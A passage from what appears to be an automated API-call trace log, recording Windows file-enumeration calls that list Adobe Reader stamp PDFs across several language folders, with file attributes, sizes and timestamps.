cAlternateFileName="")) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x322cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x322cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.689] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80731040, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZE", cAlternateFileName="")) returned 1 [0058.689] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80731040, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.692] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80731040, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.692] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Faces.pdf", cAlternateFileName="")) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pointers.pdf", cAlternateFileName="")) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5274b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c339, dwReserved0=0x0, dwReserved1=0x0, cFileName="Standard.pdf", cAlternateFileName="")) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15c7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80731040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15c7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.693] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.694] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DAN", cAlternateFileName="")) returned 1 [0058.694] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.695] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.695] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe6d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.696] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9306, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.696] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18757, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.696] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18757, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.696] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.696] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEU", cAlternateFileName="")) returned 1 [0058.696] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.697] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.697] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xcadf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.697] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa36f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.697] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x178c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.697] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x178c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.698] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.698] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENU", cAlternateFileName="")) returned 1 [0058.698] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.699] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.699] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xdf82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.699] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9f16, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.699] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a8db, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.699] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a8db, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.699] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.699] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ESP", cAlternateFileName="")) returned 1 [0058.700] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.701] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.701] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xcdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.701] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8c96, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.701] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff748c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9a88d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.701] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff748c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9a88d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.701] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.701] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81e8c820, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EUQ", cAlternateFileName="")) returned 1 [0058.701] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81e8c820, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.704] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81e8c820, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.704] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xcdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.704] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x892d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Faces.pdf", cAlternateFileName="")) returned 1 [0058.704] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, 